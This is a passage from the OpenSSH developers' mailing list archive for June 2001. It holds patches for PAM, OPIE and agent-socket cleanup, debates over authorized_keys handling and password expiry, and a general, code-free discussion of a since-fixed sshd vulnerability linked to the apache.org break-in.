in it recently... We look forward to your patches. In the meantime, we are very tired of your lengthy chit-chats, so send in fixes, or SHUT UP. I can't believe how patient we are with people who yammer on and on and on. From wichert at cistron.nl Tue Jun 5 07:45:54 2001 From: wichert at cistron.nl (Wichert Akkerman) Date: Mon, 4 Jun 2001 23:45:54 +0200 Subject: password_authtentication option ignored in auth handling Message-ID: <20010604234554.A26589@cistron.nl> There is one spot where the password_authentication option was ignored, patch follows. Wichert. diff -wur org/openssh-2.5.2p2/auth2.c openssh-2.5.2p2/auth2.c --- org/openssh-2.5.2p2/auth2.c Sun Mar 11 21:01:56 2001 +++ openssh-2.5.2p2/auth2.c Mon Jun 4 23:31:54 2001 @@ -397,7 +397,7 @@ authenticated = auth2_challenge(authctxt, devs); #ifdef USE_PAM - if (authenticated == 0) + if (options.password_authentication && authenticated == 0) authenticated = auth2_pam(authctxt); #endif xfree(lang); -- _________________________________________________________________ / Nothing is fool-proof to a sufficiently talented fool \ | wichert at cistron.nl http://www.liacs.nl/~wichert/ | | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 07:46:27 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Mon, 4 Jun 2001 23:46:27 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from rob@hagopian.net on Mon, Jun 04, 2001 at 04:25:49PM -0400 References: <20010604220931.B325@folly> Message-ID: <20010604234627.B11445@folly> On Mon, Jun 04, 2001 at 04:25:49PM -0400, Rob Hagopian wrote: > It does worry me that openssh still has a significant amount of ssh.com > v1.2.xx code in it. I'm sure it's been audited a number of times, but > problems have still cropped up in it recently... this is FUD. the PROTOCOL contains some minor defects. this has NOTHING to do with the 1.2.12 code. -m From wichert at cistron.nl Tue Jun 5 07:46:52 2001 From: wichert at cistron.nl (Wichert Akkerman) Date: Mon, 4 Jun 2001 23:46:52 +0200 Subject: OPIE support patch In-Reply-To: <20010603185002.C13880@cistron.nl>; from wichert@cistron.nl on Sun, Jun 03, 2001 at 06:50:02PM +0200 References: <20010603185002.C13880@cistron.nl> Message-ID: <20010604234652.B26589@cistron.nl> Previously Wichert Akkerman wrote: > I just cobbled up a little patch to add support for OPIE to > OpenSSH. Currently untested, but feedback is welcome. Figures that the first draft doesn't work, new patch is below. Don't forget to run autoheader and autoconf before trying. Wichert. diff -wur org/openssh-2.5.2p2/acconfig.h openssh-2.5.2p2/acconfig.h --- org/openssh-2.5.2p2/acconfig.h Sat Mar 17 02:15:38 2001 +++ openssh-2.5.2p2/acconfig.h Mon Jun 4 17:40:16 2001 @@ -184,6 +184,9 @@ /* Define if you want AFS support */ #undef AFS +/* Define if you want OPIE support */ +#undef OPIE + /* Define if you want S/Key support */ #undef SKEY diff -wur org/openssh-2.5.2p2/auth-chall.c openssh-2.5.2p2/auth-chall.c --- org/openssh-2.5.2p2/auth-chall.c Mon Mar 5 07:59:27 2001 +++ openssh-2.5.2p2/auth-chall.c Mon Jun 4 23:40:55 2001 @@ -67,7 +67,7 @@ debug("verify_response: <%s> = <%d>", response, authok); return authok != 0; } -#else +#else /* BSD_AUTH */ #ifdef SKEY #include @@ -88,6 +88,28 @@ skey_haskey(authctxt->pw->pw_name) == 0 && skey_passcheck(authctxt->pw->pw_name, response) != -1); } +#else /* SKEY */ +#ifdef OPIE +#include + +char * +get_challenge(Authctxt *authctxt, char *devs) +{ + static char challenge[OPIE_CHALLENGE_MAX+64]; + if (opiechallenge(&authctxt->opie_data, authctxt->user, challenge) != 0) { + debug2("opiechallenge failed"); + + return NULL; + } + strlcat(challenge, "\nOPIE Password: ", sizeof challenge); + return challenge; +} +int +verify_response(Authctxt *authctxt, char *response) +{ + return authctxt->valid && !opieverify(&authctxt->opie_data, response); +} + #else /* not available */ char * @@ -101,4 +123,5 @@ return 0; } #endif -#endif +#endif /* !SKEY */ +#endif /* !BSD_AUTH */ diff -wur org/openssh-2.5.2p2/auth.h openssh-2.5.2p2/auth.h --- org/openssh-2.5.2p2/auth.h Mon Mar 5 06:56:41 2001 +++ openssh-2.5.2p2/auth.h Mon Jun 4 17:40:16 2001 @@ -35,6 +35,10 @@ #include #endif +#ifdef OPIE +#include +#endif + typedef struct Authctxt Authctxt; struct Authctxt { int success; @@ -48,6 +52,9 @@ char *style; #ifdef BSD_AUTH auth_session_t *as; +#endif +#ifdef OPIE + struct opie opie_data; #endif }; diff -wur org/openssh-2.5.2p2/configure.in openssh-2.5.2p2/configure.in --- org/openssh-2.5.2p2/configure.in Mon Mar 19 00:09:28 2001 +++ openssh-2.5.2p2/configure.in Mon Jun 4 17:40:16 2001 @@ -473,6 +473,31 @@ ) LIBS="$LIBS $KLIBS" +# Check whether user wants OPIE support +OPIE_MSG="no" +AC_ARG_WITH(opie, + [ --with-opie=PATH Enable OPIE support], + [ + if test "x$withval" != "xno" ; then + + if test "x$withval" != "xyes" ; then + CPPFLAGS="$CPPFLAGS -I${withval}/include" + LDFLAGS="$LDFLAGS -L${withval}/lib" + fi + + AC_DEFINE(OPIE) + LIBS="-lopie $LIBS" + OPIE_MSG="yes" + + AC_CHECK_FUNC(opiechallenge, + [], + [ + AC_MSG_ERROR([** Incomplete or missing OPIE libraries.]) + ]) + fi + ] +) + # Check whether user wants S/Key support SKEY_MSG="no" AC_ARG_WITH(skey, -- _________________________________________________________________ / Nothing is fool-proof to a sufficiently talented fool \ | wichert at cistron.nl http://www.liacs.nl/~wichert/ | | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | From douglas.manton at uk.ibm.com Tue Jun 5 08:00:31 2001 From: douglas.manton at uk.ibm.com (douglas.manton at uk.ibm.com) Date: Mon, 4 Jun 2001 23:00:31 +0100 Subject: Not an OpenSSH Feature Request Message-ID: <80256A61.0078DC8D.00@d06mta05.portsmouth.uk.ibm.com> I am not going to put my 2 cents in about added features. I just appreciate the reams of technical support the OpenBSD developers offers us for the code they give us for free. $400 for an F-Secure license? I have my OpenSSH T-shirt! My request will add zero bytes to the OpenSSH code base, not even in the contribs directory. Could the subject lines on the mailing list begin with something like [OpenSSH]? I don't know about anyone else, but once you are subscibed to a zillion mailing lists and want to prioritise (OpenSSH at the top, naturally) it would make life easier. I am not too fussed, but I thought this might break the monotony of "Re: authorized_keys2 directory idea" ;-) Keep up the good work. -------------------------------------------------------- Doug Manton, AT&T EMEA Commercial Security Solutions E: demanton at att.com -------------------------------------------------------- "If privacy is outlawed, only outlaws will have privacy" From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 5 08:01:40 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 5 Jun 2001 00:01:40 +0200 Subject: password_authtentication option ignored in auth handling In-Reply-To: <20010604234554.A26589@cistron.nl>; from wichert@cistron.nl on Mon, Jun 04, 2001 at 11:45:54PM +0200 References: <20010604234554.A26589@cistron.nl> Message-ID: <20010605000140.A12614@faui02.informatik.uni-erlangen.de> hm, no pam != password. 2.9 has a different fix. On Mon, Jun 04, 2001 at 11:45:54PM +0200, Wichert Akkerman wrote: > > There is one spot where the password_authentication option was ignored, > patch follows. > > Wichert. > > diff -wur org/openssh-2.5.2p2/auth2.c openssh-2.5.2p2/auth2.c > --- org/openssh-2.5.2p2/auth2.c Sun Mar 11 21:01:56 2001 > +++ openssh-2.5.2p2/auth2.c Mon Jun 4 23:31:54 2001 > @@ -397,7 +397,7 @@ > authenticated = auth2_challenge(authctxt, devs); > > #ifdef USE_PAM > - if (authenticated == 0) > + if (options.password_authentication && authenticated == 0) > authenticated = auth2_pam(authctxt); > #endif > xfree(lang); > > -- > _________________________________________________________________ > / Nothing is fool-proof to a sufficiently talented fool \ > | wichert at cistron.nl http://www.liacs.nl/~wichert/ | > | 1024D/2FA3BC2D 576E 100B 518D 2F16 36B0 2805 3CB8 9250 2FA3 BC2D | From solidaridad at ninosdepapel.org Tue Jun 5 07:55:11 2001 From: solidaridad at ninosdepapel.org (Niños de Papel) Date: Mon, 04 Jun 2001 16:55:11 -0500 Subject: Cuanto dinero vas a gastar en estas vacaciones ? Message-ID: <20010604181046.SM00313@segundo> ***** This is an HTML Message ! ***** -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010604/cbc66568/attachment.html From vinschen at redhat.com Tue Jun 5 08:21:50 2001 From: vinschen at redhat.com (Corinna Vinschen) Date: Tue, 5 Jun 2001 00:21:50 +0200 Subject: authorized_keys2 directory idea In-Reply-To: <200106042140.f54LewV25801@cvs.openbsd.org>; from deraadt@cvs.openbsd.org on Mon, Jun 04, 2001 at 03:40:58PM -0600 References: <200106042140.f54LewV25801@cvs.openbsd.org> Message-ID: <20010605002150.B22495@cygbert.vinschen.de> On Mon, Jun 04, 2001 at 03:40:58PM -0600, Theo de Raadt wrote: > If any of you put in 1% of the work Markus has put in, we would listen to > you. > > Am I being harsh? > > Yes. Am I being realistic? Yes. Just the same as in many projects. Many demands, no help. Corinna -- Corinna Vinschen Cygwin Developer Red Hat, Inc. mailto:vinschen at redhat.com From markus.friedl at informatik.uni-erlangen.de Tue Jun 5 09:17:36 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 5 Jun 2001 01:17:36 +0200 Subject: authorizedkeys2 for a DHCP based client In-Reply-To: <20010604165857.C18004@tik.ee.ethz.ch>; from ruf@tik.ee.ethz.ch on Mon, Jun 04, 2001 at 04:58:57PM +0200 References: <20010604122424.A17990@tik.ee.ethz.ch> <20010604161937.D15324@folly> <20010604165857.C18004@tik.ee.ethz.ch> Message-ID: <20010605011736.A10970@folly> On Mon, Jun 04, 2001 at 04:58:57PM +0200, Lukas Ruf wrote: > Pardon me: here comes the whole output when launching > ssh -v -v komsys-pc-lr thanks, do you have traces for the server side, too? From djm at mindrot.org Tue Jun 5 13:24:39 2001 From: djm at mindrot.org (Damien Miller) Date: Tue, 5 Jun 2001 13:24:39 +1000 (EST) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: On Mon, 4 Jun 2001, Rob Hagopian wrote: > Why even cater to those people? Even the FreeBSD security notices > specificly mention that ssh v1 has inherent security problems. I don't > even see why it's turned on by default for a distribution that > superficially appears so security concious. Please spare us the pejorative tone. Security software has to be _usable_ for it to be adopted, by offering SSH protocol 1 support (which is no longer the default anyway) OpenSSH has done more to migrate users off the legacy protocol than anyone else. If you _really_ want key-per-file, why not write a small tool that can generate authorized_key{,2} from a key-per-file directory? -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From stevesk at pobox.com Tue Jun 5 13:32:19 2001 From: stevesk at pobox.com (Kevin Steves) Date: Mon, 4 Jun 2001 20:32:19 -0700 (PDT) Subject: Handling of password & account expirations In-Reply-To: <20010604153741.B4977@basm.cerias.purdue.edu> Message-ID: On Mon, 4 Jun 2001, Brian Poole wrote: :Quoting Darren Moffat (Darren.Moffat at eng.sun.com) from 4 June 2001: :> >While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I :> >believe this is still an issue with OpenSSH in the portable release, correct? :> >We can't expect {Linux,Solaris,} to have BSD_AUTH can we? a portable BSD auth would be interesting, particularly if it shrinks the diff with openbsd openssh. i don't see why we can't do this. :> It shouldn't be an issue on those systems since OpenSSH (unlike the :> SSH Communications Inc) properly calls pam_acct_mgmt() regardless of :> which type of authentication was used. On Linux and Solaris the :> password aging is enforced in a PAM module so the correct thing happens on :> these systems when the portable release is compiled with PAM support. and hp-ux 11.X. :Okay, on Linux and Solaris it appears to be fine. FreeBSD looked good from :a quick test as well but we can't assume that just because some of the OSes :are okay that they all are. For example, on NetBSD this still works (just :like it did on OpenBSD until last week). A log snippet is included at the :end showing this on a recent snapshot. I assume there are other OSes like :this. Just because the OS does not have PAM installed does not mean that :we should let this door hang open, does it? as i recall, freebsd has integrated a patch for this for a while (since at least last summer when i looked). yes it is an issue, but i think the answer may be a portable BSD auth. From djm at mindrot.org Tue Jun 5 13:34:21 2001 From: djm at mindrot.org (Damien Miller) Date: Tue, 5 Jun 2001 13:34:21 +1000 (EST) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: On Mon, 4 Jun 2001, Rob Hagopian wrote: > I'm surprised you're advocating the use of sed on authorized_keys files! > > It's pretty sick, but: cat keys/* | sort | uniq | sed | split -l 1 > But of course you lose filenames... you might be able to pull them out of > the comment field... but the point isn't to make it more difficult... Not much, it probably took you all of 10 seconds to write the previous paragraph. It would take even less if you make is a script. > How do you see the time a key was added to your single file? Can you track > individual key changes through utils like tripwire? How about making some > keys immutable but allowing others to be updated? Can I make a symlink to > a common public key that root updates? If you have special needs, patch your own source. Most of what you ask for could be accomplished by teaching key_read() to ignore everything after the '#' character (It may already) - you could dump whatever other information you require in there. -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From mouring at etoh.eviladmin.org Tue Jun 5 13:27:46 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Mon, 4 Jun 2001 22:27:46 -0500 (CDT) Subject: Handling of password & account expirations In-Reply-To: Message-ID: On Mon, 4 Jun 2001, Kevin Steves wrote: > On Mon, 4 Jun 2001, Brian Poole wrote: > :Quoting Darren Moffat (Darren.Moffat at eng.sun.com) from 4 June 2001: > :> >While this no longer applies to OpenBSD now that we have moved to BSD_AUTH I > :> >believe this is still an issue with OpenSSH in the portable release, correct? > :> >We can't expect {Linux,Solaris,} to have BSD_AUTH can we? > > a portable BSD auth would be interesting, particularly if it shrinks the > diff with openbsd openssh. i don't see why we can't do this. > That is what I was thinking. It would be interesting if we could get IRIX and all the other Commerical OSes that require complex setup to fit into either BSD Auth or a modified version of it. - Ben From vader at conflict.net Tue Jun 5 15:33:13 2001 From: vader at conflict.net (Jim Breton) Date: Tue, 5 Jun 2001 05:33:13 +0000 Subject: pam_opie In-Reply-To: <20010602143344.B7257@xor.obsecurity.org>; from kris@obsecurity.org on Sat, Jun 02, 2001 at 02:33:44PM -0700 References: <20010602052718926722.4895@conflict.net> <20010602143344.B7257@xor.obsecurity.org> Message-ID: <20010605053313936497.4895@conflict.net> On Sat, Jun 02, 2001 at 02:33:44PM -0700, Kris Kennaway wrote: > http://www.FreeBSD.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/ Thanks, that should work well with my *BSD machines. Was hoping to find one that would be portable to my Linux systems as well, this one failed compilation... not sure if it would be easy to port though. Any ideas about others? -- Jim B. vader at conflict.net From pekkas at netcore.fi Tue Jun 5 15:42:04 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Tue, 5 Jun 2001 08:42:04 +0300 (EEST) Subject: Not an OpenSSH Feature Request In-Reply-To: <80256A61.0078DC8D.00@d06mta05.portsmouth.uk.ibm.com> Message-ID: On Mon, 4 Jun 2001 douglas.manton at uk.ibm.com wrote: > Could the subject lines on the mailing list begin with something like > [OpenSSH]? > > I don't know about anyone else, but once you are subscibed to a zillion > mailing lists and want to prioritise (OpenSSH at the top, naturally) it > would make life easier. I am not too fussed, but I thought this might > break the monotony of "Re: authorized_keys2 directory idea" ;-) IMO, this would just add extra 10 characters or so to the subject, reducing effectively usable limit. It's better to base your filtering based on sender or receiver addresses. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From ms at speakeasy.net Tue Jun 5 15:50:38 2001 From: ms at speakeasy.net (Michael Salmon) Date: Mon, 4 Jun 2001 22:50:38 -0700 Subject: Not an OpenSSH Feature Request In-Reply-To: ; from pekkas@netcore.fi on Tue, Jun 05, 2001 at 08:42:04AM +0300 References: <80256A61.0078DC8D.00@d06mta05.portsmouth.uk.ibm.com> Message-ID: <20010604225038.O14493@speakeasy.net> procmail On Tue, Jun 05, 2001 at 08:42:04AM +0300, Pekka Savola wrote: > On Mon, 4 Jun 2001 douglas.manton at uk.ibm.com wrote: > > Could the subject lines on the mailing list begin with something like > > [OpenSSH]? > > > > I don't know about anyone else, but once you are subscibed to a zillion > > mailing lists and want to prioritise (OpenSSH at the top, naturally) it > > would make life easier. I am not too fussed, but I thought this might > > break the monotony of "Re: authorized_keys2 directory idea" ;-) > > IMO, this would just add extra 10 characters or so to the subject, > reducing effectively usable limit. > > It's better to base your filtering based on sender or receiver addresses. > > -- > Pekka Savola "Tell me of difficulties surmounted, > Netcore Oy not those you stumble over and fall" > Systems. Networks. Security. -- Robert Jordan: A Crown of Swords > From Jarno.Huuskonen at uku.fi Tue Jun 5 16:21:46 2001 From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen) Date: Tue, 5 Jun 2001 09:21:46 +0300 Subject: OpenSSH tmp cleanup Message-ID: <20010605092146.A39858@messi.uku.fi> Hi, I noticed that Markus has fixed the temporary file cleanup problems in OpenSSH cvs. What files need patching for this ? I only noticed changes in: session.c, channels.h and channels.c. -Jarno -- Jarno Huuskonen From pekkas at netcore.fi Tue Jun 5 16:58:28 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Tue, 5 Jun 2001 09:58:28 +0300 (EEST) Subject: Not an OpenSSH Feature Request In-Reply-To: <20010604225038.O14493@speakeasy.net> Message-ID: On Mon, 4 Jun 2001, Michael Salmon wrote: > procmail This could be interpreted that procmail can be either a problem or a solution with the current scheme. FWIW, procmail works just fine for me. > On Tue, Jun 05, 2001 at 08:42:04AM +0300, Pekka Savola wrote: > > On Mon, 4 Jun 2001 douglas.manton at uk.ibm.com wrote: > > > Could the subject lines on the mailing list begin with something like > > > [OpenSSH]? > > > > > > I don't know about anyone else, but once you are subscibed to a zillion > > > mailing lists and want to prioritise (OpenSSH at the top, naturally) it > > > would make life easier. I am not too fussed, but I thought this might > > > break the monotony of "Re: authorized_keys2 directory idea" ;-) > > > > IMO, this would just add extra 10 characters or so to the subject, > > reducing effectively usable limit. > > > > It's better to base your filtering based on sender or receiver addresses. > > > > -- > > Pekka Savola "Tell me of difficulties surmounted, > > Netcore Oy not those you stumble over and fall" > > Systems. Networks. Security. -- Robert Jordan: A Crown of Swords > > > -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From djm at mindrot.org Tue Jun 5 18:40:20 2001 From: djm at mindrot.org (Damien Miller) Date: Tue, 5 Jun 2001 18:40:20 +1000 (EST) Subject: Not an OpenSSH Feature Request In-Reply-To: Message-ID: On Tue, 5 Jun 2001, Pekka Savola wrote: > On Mon, 4 Jun 2001, Michael Salmon wrote: > > procmail > > This could be interpreted that procmail can be either a problem or a > solution with the current scheme. If you have a strong stomach, have a read of the procmail code some time... -d -- | Damien Miller \ ``E-mail attachments are the poor man's | http://www.mindrot.org / distributed filesystem'' - Dan Geer From pekkas at netcore.fi Tue Jun 5 18:53:39 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Tue, 5 Jun 2001 11:53:39 +0300 (EEST) Subject: authorized_keys2 directory idea In-Reply-To: Message-ID: On Tue, 5 Jun 2001, Damien Miller wrote: > If you _really_ want key-per-file, why not write a small tool that > can generate authorized_key{,2} from a key-per-file directory? This is a very good idea, and IMO solves most of the problems brought up here. It's still a bit cumbersome to do that daily for 1000 users but that's kind of a corner-case and can be, to some extent, be worked around (e.g. do it in shell initscripts, not cron). Personally, I write code to the community as much as myself, and if it isn't going to used widely, I'm not going to do it. This kind of tool enables the best of the both worlds: if someone patches OpenSSH, no need to run it; and it works with original OpenSSH too if someone wants the functionality. And the main code base can be kept smaller if that is the desire. An external non-privileged module run from cron if I may ;-) I had hoped the thread started by me hadn't degenerated into this kind of "deep discussion". Oh well. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From auto92089 at hushmail.com Tue Jun 5 15:06:38 2001 From: auto92089 at hushmail.com (auto92089 at hushmail.com) Date: Mon, 4 Jun 2001 23:06:38 -0600 (CDT) Subject: 11.82 bpw clarification (was Re: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char!) Message-ID: <200106050907.CAA09782@user3.hushmail.com> >Trolling is such fun, isn't it? I was trying to making merriment, not to provoke emotional responses. I am conflicted on publicly responding, but decided to clarify just in case your confusion is shared by others with better impulse control. Unfortunately, an unchallenged statement made in the company or under the scrutiny of experts is often assumed true, which is really the original problem I sought to fix! I notice that the maintainers have quietly fixed the problem in the web-accessible ssh-keygen manpage and presumably latest code - thanks. One shudders at how many crypto-enthusiasts have read that page and failed to notice or correct it! >Entropy rate does not mean that If you read the manpage which I quoted for your convenience, it said "1-2 bits of entropy per word". Nowhere has anyone mentioned "rate". Even so, a rate is the relation between two measurements, and we could easily have bits per character or bits per word, depending on the definition of "symbol" used. As such, my interpretation (and I suspect many other people's) is that the manpage was describing the entropy of an entire word (...given the word's preceeding context). I suspect the original author of the manpage is from Finland also; perhaps the confusion is due to some language difference. >if you are shown an English word, >character by character, how long does it take to guess the whole word? >Try a couple of them: >moro_ >idio_ >trol_ What you are alluding to is the conditional probability of the (in your examples, last) character dependent on the preceeding ones. While that is an interesting measurement, it's not the one under discussion, and has units of "bits per character" (or letter). http://cs.fit.edu/~mmahoney/dissertation/entropy1.html "Refining the Estimated Entropy of English by Shannon Game Simulation" A reasonable primer on Shannon's estimates of entropy. http://www.stanford.edu/~vjsriniv/project/entropy_of_english_9.htm Covers both of Shannon's methods for estimating H for English (by character using n-grams, by word using Zipf's relations) http://www.voynich.nu/wordent.html "From digraph entropy to word entropy in the Voynich MS" This is cited here because it relates bits per letter and bits per word by the trivial relation of summing, and because it's very cool. Note that for comparisons of different lengths you need to pad each word with a word-end symbol, the first of which may add some entropy (as in "word" vs. "words"). There's a ton of interesting articles which pop up after searching for "entropy" and "shannon" and ilk, but I must stop somewhere and introduce the coup de grace, courtesy of some obscure man who worked for the telephone company. Note that this is the independent or 0-order entropy; I was unable to find a handy reference with contextual word entropy estimates, but clearly is far from 1-2 bpw: "Prediction and Entropy of Printed English", by C.E. Shannon Bell Syst. Tech. J. 30:50-64 1951 "...Using logarithmic scales for probability and rank, the curve approximates a straight line with slope -1; this, if p_n is the probability of the nth most frequent word, we have, roughly p_n = 0.1/n . Zipf has pointed out that this type of formula, p_n = k/n, gives a rather good approximation to the word probabilities in many different languages. The formula [above] clearly can not hold indefinitely since the total probablility SUM p_n must be unity, while SUM_1^inf 0.1/n is infinite. If we assume (in the absence of any better estimate) that the formula p_n = 0.1/n holds out to the n at which the total probability is unity, and that p_n = 0 for larger n; we find that the critical n is the word rank 8,727. The entropy is then: -SUM_1^8727 p_n log_2 p_n = 11.82 bits per word." YHNBT. YHL. HAND. I, Zone Lee Free, encrypted, secure Web-based email at www.hushmail.com From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 5 19:17:53 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 5 Jun 2001 11:17:53 +0200 Subject: 11.82 bpw clarification (was Re: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char!) In-Reply-To: <200106050907.CAA09782@user3.hushmail.com>; from auto92089@hushmail.com on Mon, Jun 04, 2001 at 11:06:38PM -0600 References: <200106050907.CAA09782@user3.hushmail.com> Message-ID: <20010605111753.B15889@faui02.informatik.uni-erlangen.de> On Mon, Jun 04, 2001 at 11:06:38PM -0600, auto92089 at hushmail.com wrote: > I notice that the maintainers have quietly fixed the problem > in the web-accessible ssh-keygen manpage and presumably > latest code - thanks. this was not 'quietly fixed' since fixed it in the CVS. however, i did not find a name your mail, so i could not give credit. > One shudders at how many crypto-enthusiasts > have read that page and failed to notice or correct it! it's in the ssh-keygen manpage since 1995 From _nuub at yahoo.com Tue Jun 5 19:22:24 2001 From: _nuub at yahoo.com (nuuB) Date: Tue, 5 Jun 2001 02:22:24 -0700 (PDT) Subject: Recent breakins / SSHD root hole? Message-ID: <20010605092224.4096.qmail@web11201.mail.yahoo.com> >> No, I don't think so. AFAIK that bug was fixed in 2.1.1, and apache.org >> reportedly ran "OpenSSH 2.2". > >apache.org never had an insecure ssh, someone knew a password for an >account and used that. Wichert. Not if their issued statement reflects what actually happened: "The ssh client at SourceForge had been compromised to log outgoing names and passwords, so the cracker was thus able get a shell on apache.org. After unsuccessfully attempting to get elevated privileges using an old installation of Bugzilla on apache.org, [- here comes the important bit -] the cracker used a weakness in the ssh daemon (OpenSSH 2.2) to gain root privileges." I.e they only used an account to get local (non-root) access. The point here was that after they had local access they rooted the box using "a weakness" in the ssh server. I'm assuming this weakness is the CRC attack detector bug mentioned previously in this thread. The released exploit requires a lot of constants to be correct, and finding them requires you have more than half a clue and some time to spare. If the sshd binary was readable, or came from a known distributions it would be quite feasable to find the constants required. Bruteforcing some of the constants is also quite fast with local access, and due to the nature of the bug the server crashes before any logging takes place (unless sshd was configured to log more than normal). nuuB __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail - only $35 a year! http://personal.mail.yahoo.com/ From Markus.Friedl at informatik.uni-erlangen.de Tue Jun 5 19:30:46 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 5 Jun 2001 11:30:46 +0200 Subject: Recent breakins / SSHD root hole? In-Reply-To: <20010605092224.4096.qmail@web11201.mail.yahoo.com>; from _nuub@yahoo.com on Tue, Jun 05, 2001 at 02:22:24AM -0700 References: <20010605092224.4096.qmail@web11201.mail.yahoo.com> Message-ID: <20010605113045.C15889@faui02.informatik.uni-erlangen.de> > the cracker used > a weakness in the ssh daemon (OpenSSH 2.2) to gain root privileges." we've been talking to some apache developers, at they said that it is likely that the attacker gained root access by exploiting the crc/malloc(0) bug in their old OpenSSH 2.2 daemon. this bug has been mentioned earlier, may SSH v1 implementations suffer from the same bug. the bug has been fixed in OpenSSH 2.3.1. From gert at greenie.muc.de Tue Jun 5 21:46:58 2001 From: gert at greenie.muc.de (Gert Doering) Date: Tue, 5 Jun 2001 13:46:58 +0200 Subject: authorized_keys2 directory idea In-Reply-To: <20010605002150.B22495@cygbert.vinschen.de>; from Corinna Vinschen on Tue, Jun 05, 2001 at 12:21:50AM +0200 References: <200106042140.f54LewV25801@cvs.openbsd.org> <20010605002150.B22495@cygbert.vinschen.de> Message-ID: <20010605134658.E22510@greenie.muc.de> Hi, On Tue, Jun 05, 2001 at 12:21:50AM +0200, Corinna Vinschen wrote: > On Mon, Jun 04, 2001 at 03:40:58PM -0600, Theo de Raadt wrote: > > If any of you put in 1% of the work Markus has put in, we would listen to > > you. > > > > Am I being harsh? > > > > Yes. Am I being realistic? Yes. > > Just the same as in many projects. Many demands, no help. While I originally wanted to stay out of this discussion, I just want to point out that many of the people actually discussing here *have* contributed - by testing "foreign" architectures and providing patches (or at least input), or by offering patches that haven't been included. So that's not really fair. The help *is* there, but it is rejected (in case of the features being discussed). gert -- USENET is *not* the non-clickable part of WWW! //www.muc.de/~gert/ Gert Doering - Munich, Germany gert at greenie.muc.de fax: +49-89-35655025 gert.doering at physik.tu-muenchen.de From raj at cerias.purdue.edu Tue Jun 5 23:21:09 2001 From: raj at cerias.purdue.edu (Brian Poole) Date: Tue, 5 Jun 2001 08:21:09 -0500 Subject: Handling of password & account expirations In-Reply-To: ; from stevesk@pobox.com on Mon, Jun 04, 2001 at 08:32:19PM -0700 References: <20010604153741.B4977@basm.cerias.purdue.edu> Message-ID: <20010605082109.C4977@basm.cerias.purdue.edu> Quoting Kevin Steves (stevesk at pobox.com) from 4 June 2001: > a portable BSD auth would be interesting, particularly if it shrinks the > diff with openbsd openssh. i don't see why we can't do this. I can't see a reason besides the time factor, just requires someone to actually write it. > yes it is an issue, but i think the answer may be a portable BSD auth. I can deal with that, I'm just glad that others agree that there is an issue and it is something that should be dealt with. So what is next? Who codes this portable BSD auth? I'm interested by BSD auth but haven't found a ton of information on it (besides the man pages which just give function information). -b From Markus.Friedl at informatik.uni-erlangen.de Wed Jun 6 00:54:04 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 5 Jun 2001 16:54:04 +0200 Subject: OpenSSH tmp cleanup In-Reply-To: <20010605092146.A39858@messi.uku.fi>; from Jarno.Huuskonen@uku.fi on Tue, Jun 05, 2001 at 09:21:46AM +0300 References: <20010605092146.A39858@messi.uku.fi> Message-ID: <20010605165404.A13522@faui02.informatik.uni-erlangen.de> On Tue, Jun 05, 2001 at 09:21:46AM +0300, Jarno Huuskonen wrote: > I noticed that Markus has fixed the temporary file cleanup problems in > OpenSSH cvs. What files need patching for this ? I only noticed > changes in: session.c, channels.h and channels.c. yes. i tried to port this back to 2.9, but i don't have time for testing etc. simple fix is s/cookies/x11_forwarding_with_openssh_is_fun/ in session.c correct fix looks like: Index: channels.c =================================================================== RCS file: /home/markus/cvs/ssh/channels.c,v retrieving revision 1.109 diff -u -r1.109 channels.c --- channels.c 2001/04/17 12:55:03 1.109 +++ channels.c 2001/06/05 14:38:42 @@ -2524,10 +2524,17 @@ /* removes the agent forwarding socket */ void -cleanup_socket(void) +auth_sock_cleanup_proc(void *_pw) { - unlink(channel_forwarded_auth_socket_name); - rmdir(channel_forwarded_auth_socket_dir); + struct passwd *pw = _pw; + + if (channel_forwarded_auth_socket_name) { + temporarily_use_uid(pw); + unlink(channel_forwarded_auth_socket_name); + rmdir(channel_forwarded_auth_socket_dir); + channel_forwarded_auth_socket_name = NULL; + restore_uid(); + } } /* @@ -2566,11 +2573,9 @@ snprintf(channel_forwarded_auth_socket_name, MAX_SOCKET_NAME, "%s/agent.%d", channel_forwarded_auth_socket_dir, (int) getpid()); - if (atexit(cleanup_socket) < 0) { - int saved = errno; - cleanup_socket(); - 